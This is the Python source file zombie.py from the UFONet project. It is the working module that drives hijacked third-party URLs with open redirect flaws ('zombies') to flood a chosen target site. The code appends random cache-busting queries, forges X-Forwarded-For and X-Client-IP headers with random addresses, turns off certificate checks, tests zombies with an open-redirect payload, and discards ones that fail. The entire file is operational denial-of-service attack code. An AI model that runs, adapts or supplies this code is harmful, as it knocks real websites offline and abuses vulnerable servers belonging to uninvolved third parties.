zombie.py 12 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. This file is part of the UFONet project, https://ufonet.03c8.net
  5. Copyright (c) 2013/2020 | psy <epsylon@riseup.net>
  6. You should have received a copy of the GNU General Public License along
  7. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  8. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  9. """
  10. import io, hashlib, re, sys, certifi
  11. import time, threading, random
  12. from .randomip import RandomIP
  13. try:
  14. import pycurl
  15. except:
  16. print("\nError importing: pycurl lib. \n\n")
  17. sys.exit(2)
  18. class Zombie: # class representing a zombie
  19. # constructor: function to construct a zombie
  20. # ufo: UFONet object, some state variables are recovered as well
  21. # zombie: name/url of zombie
  22. def __init__(self, ufo, zombie):
  23. self.ufo = ufo
  24. self.payload=ufo.payload
  25. self.attack_mode=ufo.attack_mode
  26. self.zombie = zombie
  27. self.connection_failed=True
  28. # wait for semaphore to be ready, add to herd, connect & suicide!
  29. def connect(self):
  30. reply=None
  31. with self.ufo.sem:
  32. self.ufo.herd.new_zombie(self.zombie)
  33. reply=self.do_connect()
  34. self.ufo.herd.kill_zombie(self.zombie, reply, self.connection_failed)
  35. return reply
  36. # handles zombie connection
  37. def do_connect(self):
  38. # connect zombies and manage different options: HEAD, GET, POST,
  39. # user-Agent, referer, timeout, retries, threads, delay..
  40. options = self.ufo.options
  41. c = pycurl.Curl()
  42. if self.ufo.head == True:
  43. try:
  44. c.setopt(pycurl.URL, self.zombie) # set 'self.zombie' target
  45. except:
  46. c.setopt(pycurl.URL, self.zombie.encode('utf-8'))
  47. c.setopt(pycurl.NOBODY, True) # use HEAD
  48. if self.payload == True:
  49. payload = self.zombie + "https://www.whitehouse.gov" # Open Redirect payload [requested by all UFONet motherships ;-)]
  50. try:
  51. c.setopt(pycurl.URL, payload) # set 'self.zombie' payload
  52. except:
  53. c.setopt(pycurl.URL, payload.encode('utf-8'))
  54. c.setopt(pycurl.NOBODY, 0) # use GET
  55. #if self.ufo.external == True:
  56. # external_service = "https://status.ws/" # external check
  57. # if options.target.startswith('https://'): # fixing url prefix
  58. # options.target = options.target.replace('https://','')
  59. # if options.target.startswith('http://'): # fixing url prefix
  60. # options.target = options.target.replace('http://','')
  61. # external = external_service + options.target
  62. # try:
  63. # c.setopt(pycurl.URL, external) # external HEAD check before to attack
  64. # except:
  65. # c.setopt(pycurl.URL, external.encode('utf-8'))
  66. # c.setopt(pycurl.NOBODY, 0) # use GET
  67. if self.attack_mode == True:
  68. if options.place: # use self.zombie's vector to connect to a target's place and add a random query to evade cache
  69. random_name_hash = random.randint(1, 100000000)
  70. random_hash = random.randint(1, 100000000)
  71. if options.place.endswith("/"):
  72. options.place = re.sub('/$', '', options.place)
  73. if options.place.startswith("/"):
  74. if "?" in options.place:
  75. url_attack = self.zombie + options.target + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  76. else:
  77. url_attack = self.zombie + options.target + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  78. else:
  79. if "?" in options.place:
  80. url_attack = self.zombie + options.target + "/" + options.place + "&" + str(random_name_hash) + "=" + str(random_hash)
  81. else:
  82. url_attack = self.zombie + options.target + "/" + options.place + "?" + str(random_name_hash) + "=" + str(random_hash)
  83. else:
  84. url_attack = self.zombie + options.target # Use self.zombie vector to connect to original target url
  85. if self.ufo.options.verbose:
  86. print("[Info] [Zombies] Payload:", url_attack)
  87. try:
  88. c.setopt(pycurl.URL, url_attack) # GET connection on target site
  89. except:
  90. c.setopt(pycurl.URL, url_attack.encode('utf-8'))
  91. c.setopt(pycurl.NOBODY, 0) # use GET
  92. # set fake headers (important: no-cache)
  93. fakeheaders = ['Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg',
  94. 'Connection: Keep-Alive',
  95. 'Content-type: application/x-www-form-urlencoded; charset=UTF-8',
  96. 'Cache-control: no-cache',
  97. 'Pragma: no-cache',
  98. 'Pragma-directive: no-cache',
  99. 'Cache-directive: no-cache',
  100. 'Expires: 0']
  101. c.setopt(pycurl.FOLLOWLOCATION, 1) # set follow redirects
  102. c.setopt(pycurl.MAXREDIRS, 10) # set max redirects
  103. c.setopt(pycurl.SSL_VERIFYHOST, 0) # don't verify host
  104. c.setopt(pycurl.SSL_VERIFYPEER, 0) # don't verify peer
  105. # c.setopt(pycurl.SSLVERSION, pycurl.SSLVERSION_SSLv3) # sslv3
  106. c.setopt(pycurl.CAINFO, certifi.where()) # black magic
  107. c.setopt(pycurl.COOKIEFILE, '/dev/null') # black magic
  108. c.setopt(pycurl.COOKIEJAR, '/dev/null') # black magic
  109. c.setopt(pycurl.FRESH_CONNECT, 1) # important: no cache!
  110. c.setopt(pycurl.NOSIGNAL, 1) # pass 'long' to stack to fix libcurl bug
  111. c.setopt(pycurl.ENCODING, "") # use all available encodings (black magic)
  112. if options.xforw: # set x-forwarded-for
  113. generate_random_xforw = RandomIP()
  114. xforwip = generate_random_xforw._generateip('')
  115. xforwfakevalue = ['X-Forwarded-For: ' + str(xforwip)]
  116. fakeheaders = fakeheaders + xforwfakevalue
  117. if options.xclient: # set x-client-ip
  118. generate_random_xclient = RandomIP()
  119. xclientip = generate_random_xclient._generateip('')
  120. xclientfakevalue = ['X-Client-IP: ' + str(xclientip)]
  121. fakeheaders = fakeheaders + xclientfakevalue
  122. if options.host: # set http host header
  123. host_fakevalue = ['Host: ' + str(options.host)]
  124. fakeheaders = fakeheaders + host_fakevalue
  125. c.setopt(pycurl.HTTPHEADER, fakeheaders) # set fake headers
  126. b = io.BytesIO()
  127. c.setopt(pycurl.HEADERFUNCTION, b.write)
  128. h = io.BytesIO()
  129. c.setopt(pycurl.WRITEFUNCTION, h.write)
  130. if options.agent: # set user-agent
  131. c.setopt(pycurl.USERAGENT, options.agent)
  132. else:
  133. c.setopt(pycurl.USERAGENT, self.ufo.user_agent)
  134. if options.referer: # set referer
  135. c.setopt(pycurl.REFERER, options.referer)
  136. else:
  137. c.setopt(pycurl.REFERER, self.ufo.referer)
  138. if options.proxy: # set proxy
  139. proxy = options.proxy
  140. sep = ":"
  141. proxy_ip = proxy.rsplit(sep, 1)[0]
  142. if proxy_ip.startswith('http://'):
  143. proxy_ip = proxy_ip.replace('http://', '')
  144. elif proxy_ip.startswith('https://'):
  145. proxy_ip = proxy_ip.replace('https://', '')
  146. proxy_port = proxy.rsplit(sep, 1)[1]
  147. if proxy_ip == '127.0.0.1': # working by using 'localhost' as http proxy (ex: privoxy)
  148. proxy_ip = 'localhost'
  149. c.setopt(pycurl.PROXY, proxy_ip)
  150. c.setopt(pycurl.PROXYPORT, int(proxy_port))
  151. else:
  152. c.setopt(pycurl.PROXY, '')
  153. c.setopt(pycurl.PROXYPORT, pycurl.PROXYPORT)
  154. if options.timeout: # set timeout
  155. c.setopt(pycurl.TIMEOUT, options.timeout)
  156. c.setopt(pycurl.CONNECTTIMEOUT, options.timeout)
  157. else:
  158. c.setopt(pycurl.TIMEOUT, 5) # low value trying to control OS/python overflow when too many threads are open
  159. c.setopt(pycurl.CONNECTTIMEOUT, 5)
  160. if options.delay: # set delay
  161. self.ufo.delay = options.delay
  162. else:
  163. self.ufo.delay = 0 # default delay
  164. if options.retries: # set retries
  165. self.ufo.retries = options.retries
  166. else:
  167. self.ufo.retries = 0 # default retries
  168. try: # try to connect
  169. c.perform()
  170. time.sleep(self.ufo.delay)
  171. self.connection_failed = False
  172. except Exception as e: # try retries
  173. for count in range(0, self.ufo.retries):
  174. time.sleep(self.ufo.delay)
  175. try:
  176. c.perform()
  177. self.connection_failed = False
  178. except:
  179. self.connection_failed = True
  180. if self.ufo.head == True: # HEAD reply
  181. try:
  182. reply = b.getvalue().decode('utf-8')
  183. except:
  184. try:
  185. reply = b.getvalue()
  186. except:
  187. reply = None
  188. try:
  189. code_reply = c.getinfo(pycurl.HTTP_CODE)
  190. except:
  191. code_reply = 0
  192. if reply:
  193. if options.verbose:
  194. print("[Info] [AI] HEAD Reply:")
  195. print("\n"+ reply)
  196. if self.ufo.options.testrpc:
  197. return reply
  198. else:
  199. return code_reply
  200. if self.ufo.external == True: # External reply
  201. try:
  202. external_reply = h.getvalue().decode('utf-8')
  203. except:
  204. try:
  205. external_reply = h.getvalue()
  206. except:
  207. external_reply = None
  208. if external_reply:
  209. if options.verbose:
  210. print("[Info] [AI] EXTERNAL Reply:")
  211. print("\n"+ external_reply)
  212. return external_reply
  213. if self.payload == True: # Payloads reply
  214. try:
  215. payload_reply = h.getvalue().decode('utf-8')
  216. except:
  217. try:
  218. payload_reply = h.getvalue()
  219. except:
  220. payload_reply = None
  221. if payload_reply:
  222. if options.verbose:
  223. print("[Info] [AI] PAYLOAD Reply:")
  224. print("\n"+ payload_reply)
  225. return payload_reply
  226. if self.attack_mode == True: # Attack mode reply
  227. try:
  228. attack_reply = h.getvalue().decode('utf-8')
  229. except:
  230. try:
  231. attack_reply = h.getvalue()
  232. except:
  233. attack_reply = None
  234. try:
  235. reply_code = c.getinfo(c.RESPONSE_CODE)
  236. except:
  237. reply_code = 0
  238. try:
  239. reply_time = c.getinfo(c.TOTAL_TIME)
  240. except:
  241. reply_time = 0
  242. try:
  243. reply_size = len(attack_reply)
  244. except:
  245. reply_size = 0
  246. if options.verbose:
  247. print("[Info] [AI] [Zombies] "+self.zombie+" -> REPLY (HTTP Code: "+ str(reply_code)+" | Time: "+str(reply_time)+" | Size: " + str(reply_size)+")")
  248. time.sleep(5) # managing screen (multi-threading flow time compensation)
  249. if len(attack_reply) == 0:
  250. print("[Info] [Zombies] " + self.zombie + " -> FAILED (cannot connect!)")
  251. if not self.ufo.options.disablepurge: # when purge mode discard failed zombie
  252. self.ufo.discardzombies.append(self.zombie)
  253. self.ufo.num_discard_zombies = self.ufo.num_discard_zombies + 1
  254. return [reply_code, reply_time, reply_size]